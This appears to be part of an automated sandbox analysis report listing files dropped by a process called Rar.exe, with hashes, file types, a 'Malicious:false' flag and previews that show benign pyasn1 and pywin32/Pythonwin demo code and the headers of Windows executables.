                                                                                                                                                                                                                                  SSDEEP:1536:0palpev97k14M552Q/CdKLsheAYN91q5/DlCyIMlCyUk0:0pg552Q/CdKLsheAYNC/RCLwCjk0
                                                                                                                                                                                                                                  MD5:641899262B2840210B758764251F3D78
                                                                                                                                                                                                                                  SHA1:2862A1AFCC02D5EA4DE6C63E7845DE5CB01B8A67
                                                                                                                                                                                                                                  SHA-256:067BB6807740F3851730BB606F82D76C72394D8C3E90A96396C27B76427C29F2
                                                                                                                                                                                                                                  SHA-512:EEDC344E781AF3CF946515AD315489AC09D5B0CE9897A92928DD4F4BDBEB63AAF6D9130461E5BA5C1A7FBEA2AC866A0403874FB5668E9772B38B3DE6DD3CF427
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import math.import sys..from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.compat import integer.from pyasn1.type import base.from pyasn1.type import constraint.from pyasn1.type import namedtype.from pyasn1.type import namedval.from pyasn1.type import tag.from pyasn1.type import tagmap..NoValue = base.NoValue.noValue = NoValue()..__all__ = ['Integer', 'Boolean', 'BitString', 'OctetString', 'Null',. 'ObjectIdentifier', 'Real', 'Enumerated',. 'SequenceOfAndSetOfBase', 'SequenceOf', 'SetOf',. 'SequenceAndSetBase', 'Sequence', 'Set', 'Choice', 'Any',. 'NoValue', 'noValue']..# "Simple" ASN.1 types (yet incomplete)...class Integer(base.SimpleAsn1Type):. """Create |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Typ
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5284
                                                                                                                                                                                                                                  Entropy (8bit):4.634060804764904
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:vO+GivMUzElXAlmg5MpiKVcn0ehDJphw2OxfLLGTjux6Ll0XVEVVqP6KZaD0lWoS:l9UUn00DJ/yxTowTXVoqPmSWoTlk
                                                                                                                                                                                                                                  MD5:E1917FE595D824C50A0A7A31420EB0F1
                                                                                                                                                                                                                                  SHA1:75A8DFFBA503489D88DA7F4907EE63680111E9B5
                                                                                                                                                                                                                                  SHA-256:F89EDE8F486A763176F61D79D1DB4D98821C19C30183FCBE9CAA9CA33BE4FB8F
                                                                                                                                                                                                                                  SHA-512:D82794B3A9698C5B06E408A60DA860802B32C548B3B8D93A6047083940D4EB71D69DA6C9601B0850C0B39161DCA58D2313CCAA82062C6F411A59B21867FA2393
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import datetime..from pyasn1 import error.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ..__all__ = ['ObjectDescriptor', 'GeneralizedTime', 'UTCTime']..NoValue = univ.NoValue.noValue = univ.noValue...class ObjectDescriptor(char.GraphicString):. __doc__ = char.GraphicString.__doc__.. #: Default :py:class:`~pyasn1.type.tag.TagSet` object for |ASN.1| objects. tagSet = char.GraphicString.tagSet.tagImplicitly(. tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 7). ).. # Optimization for faster codec lookup. typeId = char.GraphicString.getTypeId()...class TimeMixIn(object):.. _yearsDigits = 4. _hasSubsecond = False. _optionalMinutes = False. _shortTZ = False.. class FixedOffset(datetime.tzinfo):. """Fixed offset in minutes east from UTC."
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:magic text file for file(1) cmd, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):139
                                                                                                                                                                                                                                  Entropy (8bit):4.654604444359773
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SZ+FlJQcZ6MRxJjZuXyDelc/KOnoQjDcVVfGg9n:SZ+FTQcIMjglpOnxX1g9n
                                                                                                                                                                                                                                  MD5:52BB9E0303D810D33AFB630073561870
                                                                                                                                                                                                                                  SHA1:8B640F65295E5D25D78DFBAFD039D20580547F54
                                                                                                                                                                                                                                  SHA-256:1863FC80A555C8EB97C875CDFA0366F624C4E39B0487D84D96536D06371A5A4D
                                                                                                                                                                                                                                  SHA-512:D4858D11932BF97A5998B76B886FA3774B94FA9DA2953B29349A8F6E494D3BFF5FC93EBF137361A483F077A17AAD0F2B4E65AC5B13844D8D3028431FB2FCAF9B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Magic utility that "redirects" to pythoncomxx.dll.import pywintypes..pywintypes.__import_pywin32_system_module__("pythoncom", globals()).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                                                                                  Entropy (8bit):5.5834665335727225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:QCRX2oJzD63IB2XjXx8lpyUs8jcdlT8TNrIl08jWf4Mf4MMRt4MtuPn2JbU:QCRX2ocYBSXCyUs8jcdlT9qfP87QPn2Z
                                                                                                                                                                                                                                  MD5:8707C1C5C09AF9C8EDEB693501D80459
                                                                                                                                                                                                                                  SHA1:07023271F01FA17252ECE632F9E06B5CFDAE72F4
                                                                                                                                                                                                                                  SHA-256:1301C55E13B2E3AD11976474A8C8BC544628615391D26E13C8C982948572CBB4
                                                                                                                                                                                                                                  SHA-512:2880158CFFC0ACC058DD353D636A28E6C777478E8E5BDE65BD7D58012382D785E5E47900A09D80B5EAF6F40A39759E61CF4568F04FDB373F97813745B9E56698
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........CE.."+.."+.."+..Z..."+..I*.."+.W/.."+.W(.."+.W..."+.."*.O"+.W*.."+..W".."+..W..."+..W).."+.Rich."+.........PE..L.../..d.................B...p.......2.......`....@.......................................@....................................................................\...(...T...................H...........@............`...............................text....@.......B.................. ..`.rdata..pD...`...F...F..............@..@.data...|...........................@....rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79872
                                                                                                                                                                                                                                  Entropy (8bit):6.012195383549612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:eDt5SreqMB+0FLpO+Mqs8jcdx82MjxDnFxhkxDMamn0VH:XeH4mQlvXMjjHkxDMamn0VH
                                                                                                                                                                                                                                  MD5:FC3C025CE86123910C283BB65D622DB7
                                                                                                                                                                                                                                  SHA1:A8124727527D35C8716CFBC9AC1756A80D71EAED
                                                                                                                                                                                                                                  SHA-256:48E2508B3D6B1AD9C3688E5EF7E22A58A678835465A43DA9A91E5B3B9C798072
                                                                                                                                                                                                                                  SHA-512:3EA998B4C6A8DCD6011F9D1D2D275BD8C348BC54ED9409CF359081CD7EBDBB41E3E521D11E1C6D1A9909E1FA43938633C3757C84C41B5152EC29389B0A84018F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~z..~z..~z..w.2.zz.....zz......|z..j...xz..,...}z..,...rz..,...hz..~z...z..,...{z.....xz......z......z..Rich~z..........................PE..L...(..d...........!.....................................................................@.............................H............P..D....................`......l...T...............................@............................................text...C........................... ..`.rdata...i.......j..................@..@.data...T....0......................@....rsrc...D....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5127088
                                                                                                                                                                                                                                  Entropy (8bit):6.861766335751532
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:bJZczGW8ke6KllNHsyBqGeQVrrNW2XkGMWrGFLOAkGkzdnEVomFHKnPUUdMG:XczGRGKLBZ/YGkGMWKFLOyomFHKnPr1
                                                                                                                                                                                                                                  MD5:E76B52D11DB435D36453D26C8B446A8F
                                                                                                                                                                                                                                  SHA1:6E20C17ED973E38D4A3F26CFC020AF05FF9A6EEA
                                                                                                                                                                                                                                  SHA-256:E422C9366A53536A35E307EF301F08661C28C29B7FCDA1B454333C6A41C6BB21
                                                                                                                                                                                                                                  SHA-512:486BE0145D5E439D3D9F5191A4A49EA3685619796557CD7A361117C25A279EE7B94A9FF70C4D73ADBE839A6CE508AB15692DDD8FD6EABC3DBEF18B68D6B0C67F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8'..Vt..Vt..VtI.Su..VtI.Qu..VtI.Ru..Vt...t..Vt..Wu..Vt..Ru..Vt..Uu..VtI.Wu..Vt..WtX.Vt..Su..Vt.._u7.Vt..Vu..Vt...t..Vt..Tu..VtRich..Vt................PE..L......a.........."!......3..r......`L......../..............................`N.....M.N...@A............................L.....4...... 5...............N..'....J.|...p.3.8............................a..@.............4.......3......................text.....3.......3................. ..`.data...H.....3.......3.............@....idata..DS....4..T....4.............@..@.didat........5.......4.............@....rsrc........ 5.......4.............@..@.reloc..|.....J......tJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7718
                                                                                                                                                                                                                                  Entropy (8bit):4.592237270639104
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:BpQF0mSEkAkZaWIXg7MnjUh/DzlibXD+54SWh:BpQF01EkAkYWV7MnAhi
                                                                                                                                                                                                                                  MD5:DAB1FA8EF5CBB32C53DAAADE0373E944
                                                                                                                                                                                                                                  SHA1:9454BC395B84842739E17BB8EEAC4B28A411E0D1
                                                                                                                                                                                                                                  SHA-256:59077C392496D99BF4909EB6FB63E8F377BCDCF9950E87DBC482940F3570034B
                                                                                                                                                                                                                                  SHA-512:A38349EC5F88D9B03E2E863DE58F1C915A513A69CEF4CDEEAE716F266865C398AC180FFFBBDFB303DB73D96D1E9A1C5D317BE7990042C60CF50674CF2FBC9A5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# basictimerapp - a really simple timer application..# This should be run using the command line:.# pythonwin /app demos\basictimerapp.py.import sys.import time..import timer.import win32api.import win32con.import win32ui.from pywin.framework import app, cmdline, dlgappcore...class TimerAppDialog(dlgappcore.AppDialog):. softspace = 1.. def __init__(self, appName=""):. dlgappcore.AppDialog.__init__(self, win32ui.IDD_GENERAL_STATUS). self.timerAppName = appName. self.argOff = 0. if len(self.timerAppName) == 0:. if len(sys.argv) > 1 and sys.argv[1][0] != "/":. self.timerAppName = sys.argv[1]. self.argOff = 1.. def PreDoModal(self):. # ..sys.stderr = sys.stdout. pass.. def ProcessArgs(self, args):. for arg in args:. if arg == "/now":. self.OnOK().. def OnInitDialog(self):. win32ui.SetProfileFileName("pytimer.ini"). self.title = win32ui.GetProfileV
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5955
                                                                                                                                                                                                                                  Entropy (8bit):4.794297003026542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:k9oKEUAIAd+zTwGqMhWEtMdJjqsXfFfPHpqhN22Vk20EO/:keDdQ4MUE2jqsXfFfP47TO/
                                                                                                                                                                                                                                  MD5:313F44AF5BAF16427E808A61EBAE9159
                                                                                                                                                                                                                                  SHA1:588458E41D82A3E10DB5C7D6432CA7361960A620
                                                                                                                                                                                                                                  SHA-256:8BAE84415E88C3B9445F20959AA8BD176F55196B56B2BAA029FD71A48C231E03
                                                                                                                                                                                                                                  SHA-512:F5146BCD14A052B9C4AA818C5ACDD468EB4014A1CC554CD74551C82770D4501E03FE4C3911B10435088F8C631399F870837F3C2311BC7EBB44DA79356A45B547
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo of an Application object that has some custom print functionality...# If you desire, you can also run this from inside Pythonwin, in which.# case it will do the demo inside the Pythonwin environment...# This sample was contributed by Roger Burnham...import win32api.import win32con.import win32ui.from pywin.framework import app.from pywin.mfc import afxres, dialog, docview..PRINTDLGORD = 1538.IDC_PRINT_MAG_EDIT = 1010...class PrintDemoTemplate(docview.DocTemplate):. def _SetupSharedMenu_(self):. pass...class PrintDemoView(docview.ScrollView):. def OnInitialUpdate(self):. ret = self._obj_.OnInitialUpdate(). self.colors = {. "Black": (0x00 << 0) + (0x00 << 8) + (0x00 << 16),. "Red": (0xFF << 0) + (0x00 << 8) + (0x00 << 16),. "Green": (0x00 << 0) + (0xFF << 8) + (0x00 << 16),. "Blue": (0x00 << 0) + (0x00 << 8) + (0xFF << 16),. "Cyan": (0x00 << 0) + (0xFF << 8) + (0xFF << 16),. "Magenta": (
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1449
                                                                                                                                                                                                                                  Entropy (8bit):4.870913567569013
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1WMpp:zg7RHNYacPSia0LcbsoYY1Axn
                                                                                                                                                                                                                                  MD5:152D8AE021879EF2FE84E06B833C3674
                                                                                                                                                                                                                                  SHA1:684FDFC6C9F8383C7239F1509604769DEE545C23
                                                                                                                                                                                                                                  SHA-256:051E9274A22C04483C2B500E679A0485657A49419E2EBC7957E5CDA9D3081D27
                                                                                                                                                                                                                                  SHA-512:47DCBFFFEFB9A9098FA6B053FEF2BF3E4829E4AA38BDA685E12A140C1F7F7EA2EA217AE9841AFB7078099CFF78EDA9E185A7432BD9FCD18FE1F9B5EA745AEA6B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1392
                                                                                                                                                                                                                                  Entropy (8bit):4.736697406546076
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JE/qQMkkaaTgagdmVAurDZSpAaegADHvkCzCjYTXE7HWr3jJPi7VLKypX:K/qNkzacaggJHZSpSg+kCzXkoMJLHh
                                                                                                                                                                                                                                  MD5:4DDD10BD9A61F61210C5C4B081D3FB30
                                                                                                                                                                                                                                  SHA1:4FE9FEF8A41E4A970E8DA111C74474D29667112C
                                                                                                                                                                                                                                  SHA-256:B7CFCC0A1D3CE27A08E5842FD13CC4CF19D5B8C0F4DB814572F480D9B0B55EEB
                                                                                                                                                                                                                                  SHA-512:694C82C10F1C92DC9A1E1063F7EB5A2E1B6EFAEE8FBE159E6B5B1FBBFC891954398A8CEA807AFD8796B0D6E3CFEBF2D463255DEF4F9E649C8596B873150995B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# dlgappdemo - a demo of a dialog application..# This is a demonstration of both a custom "application" module,.# and a Python program in a dialog box..#.# NOTE: You CAN NOT import this module from either PythonWin or Python..# This module must be specified on the commandline to PythonWin only..# eg, PythonWin /app dlgappdemo.py..import sys..import win32ui.from pywin.framework import app, dlgappcore...class TestDialogApp(dlgappcore.DialogApp):. def CreateDialog(self):. return TestAppDialog()...class TestAppDialog(dlgappcore.AppDialog):. def __init__(self):. self.edit = None. dlgappcore.AppDialog.__init__(self, win32ui.IDD_LARGE_EDIT).. def OnInitDialog(self):. self.SetWindowText("Test dialog application"). self.edit = self.GetDlgItem(win32ui.IDC_EDIT1). print("Hello from Python"). print("args are:", end=" "). for arg in sys.argv:. print(arg). return 1.. def PreDoModal(self):. sys.stdout = sys.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1514
                                                                                                                                                                                                                                  Entropy (8bit):4.945406162781541
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:xnC/FCkAXwIRImPSHdA56ZgAKRHWS9HvYrVzysaD74+UKGrgMhr0AKAwjNWpX:GMkmS9DZghR9xYrVHaHJU4MhA9DWh
                                                                                                                                                                                                                                  MD5:3E856FE847A2C367C3877120AFDA3263
                                                                                                                                                                                                                                  SHA1:D3209422FEAFA6379D68D2903F80E335917D5B4C
                                                                                                                                                                                                                                  SHA-256:4CA762DDEFE6B2B8AB613571DEE6B698CAD21464BCDF8334A9F60813A38F599B
                                                                                                                                                                                                                                  SHA-512:0196C8A6AB7824116E5948D548E1B31B4D21DF9F8BF3971F7C67FCA61557A5B84FE7F73251E8E8319C89093385CFED3A9A73308B62361AD2BC2333FF0658FD2A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# dojobapp - do a job, show the result in a dialog, and exit..#.# Very simple - faily minimal dialog based app..#.# This should be run using the command line:.# pythonwin /app demos\dojobapp.py...import win32api.import win32con.import win32ui.from pywin.framework import app, dlgappcore...class DoJobAppDialog(dlgappcore.AppDialog):. softspace = 1.. def __init__(self, appName=""):. self.appName = appName. dlgappcore.AppDialog.__init__(self, win32ui.IDD_GENERAL_STATUS).. def PreDoModal(self):. pass.. def ProcessArgs(self, args):. pass.. def OnInitDialog(self):. self.SetWindowText(self.appName). butCancel = self.GetDlgItem(win32con.IDCANCEL). butCancel.ShowWindow(win32con.SW_HIDE). p1 = self.GetDlgItem(win32ui.IDC_PROMPT1). p2 = self.GetDlgItem(win32ui.IDC_PROMPT2).. # Do something here!.. p1.SetWindowText("Hello there"). p2.SetWindowText("from the demo").. def OnDestroy(self, msg):.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1626
                                                                                                                                                                                                                                  Entropy (8bit):4.791008026710751
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Q8ZkoKG8Cyk9sPY2rtqkTAN5pAwT9AXSgXktAabXYHF4tkhahyNghbx8V/UK9wZU:Qp4ykOk5pTuhzazY2tkhswghbNrY
                                                                                                                                                                                                                                  MD5:7C7C396C6E867204696DA73D48BBBC20
                                                                                                                                                                                                                                  SHA1:49E9550CF67F18C0F0C748513F0201E8BEC5102C
                                                                                                                                                                                                                                  SHA-256:8A7EA09735358CB953592F59DEB8343A070DC670B890E23FA3B106ACF71F3C4B
                                                                                                                                                                                                                                  SHA-512:A9162E777365CE49DBE784A2AB141C85FA6FBC0126FB0667929289CC1091E13503744DA86E477FFA9C6E9CEC3C5259433B24D451309D1B239B6388452E4440D1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:##.## helloapp.py.##.##.## A nice, small 'hello world' Pythonwin application..## NOT an MDI application - just a single, normal, top-level window..##.## MUST be run with the command line "pythonwin.exe /app helloapp.py".## (or if you are really keen, rename "pythonwin.exe" to something else, then.## using MSVC or similar, edit the string section in the .EXE to name this file).##.## Originally by Willy Heineman <wheineman@uconect.net>...import win32con.import win32ui.from pywin.mfc import afxres, dialog, window.from pywin.mfc.thread import WinApp...# The main frame..# Does almost nothing at all - doesnt even create a child window!.class HelloWindow(window.Wnd):. def __init__(self):. # The window.Wnd ctor creates a Window object, and places it in. # self._obj_. Note the window object exists, but the window itself. # does not!. window.Wnd.__init__(self, win32ui.CreateWnd()).. # Now we ask the window object to create the window itself.. self._o
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3081
                                                                                                                                                                                                                                  Entropy (8bit):4.569496612186034
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:s9hGduwsgSUORQjLlGW5LPJuB8fh/bEvNXZpi835aWt5S8AZ1lFn:s9W3sgS9KPLhBwVXm835o8A/n
                                                                                                                                                                                                                                  MD5:839F37CE522EA5F143D5CDF218C7F924
                                                                                                                                                                                                                                  SHA1:80DB27F6CA8E178642235DCB60701724ECC6CBCF
                                                                                                                                                                                                                                  SHA-256:BC4E723F913CD75D7A2F6764951E6FF1B8B3ECAEB42B4A0712EE7248D3FCEE43
                                                                                                                                                                                                                                  SHA-512:38D9864FD58B7F5D0EFDFEE07DC5ECFDB10423A27D82DE429B612F30CFD70654FD28E8E878DB0352E0980B9D7C40D5FF70A5F2EA8F86BBA6F5D2973D5E2D4C8C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# cmdserver.py..# Demo code that is not Pythonwin related, but too good to throw away.....import _thread.import sys.import traceback..import win32api.from pywin.framework import winout...class ThreadWriter:. "Assign an instance to sys.stdout for per-thread printing objects - Courtesy Guido!".. def __init__(self):. "Constructor -- initialize the table of writers". self.writers = {}. self.origStdOut = None.. def register(self, writer):. "Register the writer for the current thread". self.writers[_thread.get_ident()] = writer. if self.origStdOut is None:. self.origStdOut = sys.stdout. sys.stdout = self.. def unregister(self):. "Remove the writer for the current thread, if any". try:. del self.writers[_thread.get_ident()]. except KeyError:. pass. if len(self.writers) == 0:. sys.stdout = self.origStdOut. self.origStdOut = None.. def getwriter(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2507
                                                                                                                                                                                                                                  Entropy (8bit):4.762840106777906
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:0bf1d4PcR5nzuRT+hTQ89d+OmCTqAT1h+Ziyi48ZqFVyhFoRiV1tWVVChFoR+Lc0:0r1d4PcDzud+hTQ89gOmpp8ZOiV1tWD0
                                                                                                                                                                                                                                  MD5:EC4B22954C3BA2A557C8C581BA450C19
                                                                                                                                                                                                                                  SHA1:C0302FF926737CD773CE5153589F91AF165313FE
                                                                                                                                                                                                                                  SHA-256:5BCF0283E79FD93F828479F6BFA0A25E235B44505B76C839B370DFFA9F24E9E6
                                                                                                                                                                                                                                  SHA-512:6913B55CBA1453B278C142090F69838F163859C8A17D4CC6151FF82621746799B2DE18D8A948D6C0C332CEDAE0E5A8816E79314B022AF2315730D47AF88930FC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Window creation example.#.# .This example creates a minimal "control" that just fills in its.# .window with red. To make your own control, subclass Control and.# .write your own OnPaint() method. See PyCWnd.HookMessage for what.# .the parameters to OnPaint are..#..import win32api.import win32con.import win32ui.from pywin.mfc import dialog, window...class Control(window.Wnd):. """Generic control class""".. def __init__(self):. window.Wnd.__init__(self, win32ui.CreateWnd()).. def OnPaint(self):. dc, paintStruct = self.BeginPaint(). self.DoPaint(dc). self.EndPaint(paintStruct).. def DoPaint(self, dc): # Override this!. pass...class RedBox(Control):. def DoPaint(self, dc):. dc.FillSolidRect(self.GetClientRect(), win32api.RGB(255, 0, 0))...class RedBoxWithPie(RedBox):. def DoPaint(self, dc):. RedBox.DoPaint(self, dc). r = self.GetClientRect(). dc.Pie(r[0], r[1], r[2], r[3], 0, 0, r[2], r[3] // 2)...def M
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1494
                                                                                                                                                                                                                                  Entropy (8bit):4.882251681504472
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1W6OTpp:zg7RHNYacPSia0LcbsoYY1Amn
                                                                                                                                                                                                                                  MD5:CCA77E5A4F4DEEA9BEEC7DB407318C2E
                                                                                                                                                                                                                                  SHA1:4E50484EECAF7DA6D9EF279D153AA2A47B203A4C
                                                                                                                                                                                                                                  SHA-256:276A4BFD2D9CCDE4AAA7323DD51B98E3E39F3C6C962E560814B19E56441C8AA0
                                                                                                                                                                                                                                  SHA-512:D9702D4F855D81420B319AE1E11DEBCCFA344940F642FFA7808AF5E74336FC31E9A3892690BDC3B9386DA70BDF73D259FB703FA3E7E8AE509B19A79FBAB3C20E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2289
                                                                                                                                                                                                                                  Entropy (8bit):4.621424310687628
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:szs/T58IAcztK4sopSDyaJNED3JAGpOremEPASzeRWGrLB2PNQMUieei2tfFHYRE:4sb58IfpK4RAyaJNkJnjUrl2PtHf4Mpn
                                                                                                                                                                                                                                  MD5:48B4583263FD5DA31269422D35BD686B
                                                                                                                                                                                                                                  SHA1:4B530A24EB31F9596E9270940743BAE2EE2288D3
                                                                                                                                                                                                                                  SHA-256:EE25D0EC53230BFBC717F191530D1CEE7EC3219D2623C7372139A427F86EC6CB
                                                                                                                                                                                                                                  SHA-512:EECA8346C3D65E5BB45B13DDCE001BA319D7EAB078F7F76E3EC767E340B93BA2A47FB6B3EB4416CA5202157B02FA3B9ECB0EDC9DDBEA43631404621F90005B44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo which creates a view and a frame which displays a PPM format bitmap.#.# This hasnnt been run in a while, as I dont have many of that format around!..import win32api.import win32con.import win32ui...class DIBView:. def __init__(self, doc, dib):. self.dib = dib. self.view = win32ui.CreateView(doc). self.width = self.height = 0. # set up message handlers. # ..self.view.OnPrepareDC = self.OnPrepareDC. self.view.HookMessage(self.OnSize, win32con.WM_SIZE).. def OnSize(self, params):. lParam = params[3]. self.width = win32api.LOWORD(lParam). self.height = win32api.HIWORD(lParam).. def OnDraw(self, ob, dc):. # set sizes used for "non strecth" mode.. self.view.SetScrollSizes(win32con.MM_TEXT, self.dib.GetSize()). dibSize = self.dib.GetSize(). dibRect = (0, 0, dibSize[0], dibSize[1]). # stretch BMP.. # self.dib.Paint(dc, (0,0,self.width, self.height),dibRect). # non s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
